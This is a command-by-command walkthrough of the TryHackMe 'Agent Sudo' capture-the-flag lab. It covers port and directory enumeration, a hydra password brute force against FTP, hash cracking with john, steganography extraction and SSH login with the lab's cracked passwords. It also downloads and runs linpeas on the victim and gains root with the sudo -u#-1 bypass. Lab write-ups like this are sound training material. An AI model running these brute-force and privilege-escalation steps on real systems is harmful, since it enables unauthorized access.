Agent Sudo

Room Link: https://tryhackme.com/room/agentsudoctf

Enumerate

nmap -A $VICTIM

nmap -p- $VICTIM

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Change the user-agent to C

From

Kali

hydra -l chris -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt ftp://$VICTIM

Kali

ftp $VICTIM
Username: chris
Password: crystal

Kali

binwalk cutie.png 
binwalk cutie.png -e

Kali

zip2john 8702.zip > secure_john.txt
john --wordlist=/usr/share/wordlists/rockyou.txt secure_john.txt

Kali

7z e 8702.zip
Password: alien

Kali

steghide extract -sf cute-alien.jpg
Password: Alien51

Kali

ssh james@$VICTIM
Password: hackerrules!

Victim

ls

Kali

scp james@$VICTIM:/home/james/Alien_autospy.jpg .

Linpeas found that sudo is vulnerable, so I looked at the version online and found a way to escalate my privilege's.

Kali

wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
python2 -m SimpleHTTPServer 81

Victim

cd /tmp/
wget http://$KALI:81/linpeas.sh
chmod +x linpeas.sh 
./linpeas.sh

Link: https://www.exploit-db.com/exploits/47502

Victim

sudo -u#-1 /bin/bash

Last updated 1 year ago